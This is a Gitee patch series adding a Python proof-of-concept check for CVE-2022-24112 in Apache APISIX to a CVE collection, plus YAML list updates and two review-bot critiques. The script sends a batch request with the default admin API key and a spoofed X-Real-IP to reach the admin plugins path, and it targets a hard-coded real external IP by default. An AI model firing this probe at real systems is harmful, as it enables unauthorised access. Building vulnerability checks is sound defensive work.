From 7f6d43cb0549762b49c8b07f6143fa804c563bff Mon Sep 17 00:00:00 2001
From: YuanjZhang
Date: Thu, 9 Mar 2023 17:43:19 +0800
Subject: [PATCH 1/3] add CVE-2022-24112

---
 cve/apache/2022/CVE-2022-24112.py | 33 +++++++++++++++++++++++++++++++
 openkylin_list.yaml               |  1 +
 2 files changed, 34 insertions(+)
 create mode 100644 cve/apache/2022/CVE-2022-24112.py

diff --git a/cve/apache/2022/CVE-2022-24112.py b/cve/apache/2022/CVE-2022-24112.py
new file mode 100644
index 00000000..92941782
--- /dev/null
+++ b/cve/apache/2022/CVE-2022-24112.py
@@ -0,0 +1,33 @@
+import requests
+from secrets import token_hex
+# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE
+# https://mp.weixin.qq.com/s/5qAfjjVuE4604fMpQoEfMg
+# get poc from biu ~
+
+def poc(host, port=443):
+    scheme = 'https' if '443' in str(port) else 'http'
+    target = '{}://{}:{}'.format(scheme, host, port)
+    token = token_hex(10)
+    uris = ['/apisix/batch-requests', '/api-gw/batch']
+    hits = [f'failed to load plugin {token}']
+    data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'},
+            'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]}
+
+    try:
+        targets = ['{}{}'.format(target, uri) for uri in uris]
+        with requests.Session() as session:
+            for target in targets:
+                response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"})
+                for hit in hits:
+                    if hit in response.text:
+                        output = response.json()
+
+                        return True, host, target, output
+    except Exception as error:
+        return False
+    return False
+'''
+'''
+
+print (poc(host='183.66.101.103', port=9080))
+
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7..4a0723d8 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,6 +4,7 @@ cve:
     - CVE-2020-9490
     - CVE-2021-41773
     - CVE-2021-42013
+    - CVE-2022-24112
   linux-kernel:
     - CVE-2021-4204
     - CVE-2021-22555
-- 
Gitee
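Review bot: The `session.post(...)` line in poc() hard-codes `proxies={'http': "http://127.0.0.1:8080"}`, so on any machine where nothing listens on that port every http-scheme request raises, the `except Exception` below turns that into `return False`, and an affected host is reported as not affected — a silent false negative that also does not apply to the https branch, so results differ by port. Drop the proxy argument, or expose it as a keyword parameter `def poc(host, port=443, proxies=None):` passed through to `session.post`, and narrow the handler to `except requests.RequestException as error:` with the error logged rather than discarded (the function otherwise returns a 4-tuple on a hit and a bare bool on every other path, which callers have to special-case). The `'443' in str(port)` test is a substring match, so a port such as 4430 (constructed example) is treated as https; compare the integer instead. The module-level `print (poc(host='183.66.101.103', port=9080))` runs on import against a fixed external address; place it under `if __name__ == '__main__':` and take the host from the caller.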
From f8e12b78390c3b33aecd21ecf49c4a42fd397ff1 Mon Sep 17 00:00:00 2001
From: YuanjZhang
Date: Fri, 10 Mar 2023 13:06:14 +0800
Subject: [PATCH 2/3] add new_CVE

---
 cve/{apache/2022 => apache-APISIX}/CVE-2022-24112.py | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)
 rename cve/{apache/2022 => apache-APISIX}/CVE-2022-24112.py (78%)

diff --git a/cve/apache/2022/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py
similarity index 78%
rename from cve/apache/2022/CVE-2022-24112.py
rename to cve/apache-APISIX/CVE-2022-24112.py
index 92941782..47aecefb 100644
--- a/cve/apache/2022/CVE-2022-24112.py
+++ b/cve/apache-APISIX/CVE-2022-24112.py
@@ -1,7 +1,8 @@
 import requests
 from secrets import token_hex
+import argparse
 # Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE
-# https://mp.weixin.qq.com/s/5qAfjjVuE4604fMpQoEfMg
+
 # get poc from biu ~
 
 def poc(host, port=443):
@@ -28,6 +29,9 @@ def poc(host, port=443):
     return False
 '''
 '''
-
-print (poc(host='183.66.101.103', port=9080))
+parser = argparse.ArgumentParser(description='test')
+parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址')
+parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口')
+args = parser.parse_args()
+print (poc(host=args.ip, port=args.port))
 
-- 
Gitee

From cc190662b9186aefaf2741d3288eef9593a5eb7f Mon Sep 17 00:00:00 2001
From: YuanjZhang
Date: Fri, 10 Mar 2023 06:06:41 +0000
Subject: [PATCH 3/3] update openkylin_list.yaml.

Signed-off-by: YuanjZhang

---
 openkylin_list.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 4a0723d8..6494fa06 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,7 +4,8 @@ cve:
     - CVE-2020-9490
     - CVE-2021-41773
     - CVE-2021-42013
-    - CVE-2022-24112
+  apache-APISIX:
+    - CVE-2022-24112
   linux-kernel:
     - CVE-2021-4204
     - CVE-2021-22555
-- 
Gitee
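Review bot: The `--ip` option added in the second hunk keeps a live external address as its default (`default='183.66.101.103'`), so running the script with no arguments still sends the probe to that host; make the target explicit with `parser.add_argument('--ip', type=str, required=True, help='target host')` and drop `nargs='?'`, which does nothing useful on a `--flag` option and lets a bare `--ip` silently fall back to the default. The parser setup and the `print (poc(...))` call still execute at import time; they belong under `if __name__ == '__main__':`, and `description='test'` could name the check, e.g. `description='CVE-2022-24112 APISIX batch-requests check'`. The first hunk deletes the reference URL from the header comment and leaves an empty `#`-less blank line in its place, so the summary line above it no longer cites its source; keep the link or replace it with the advisory reference.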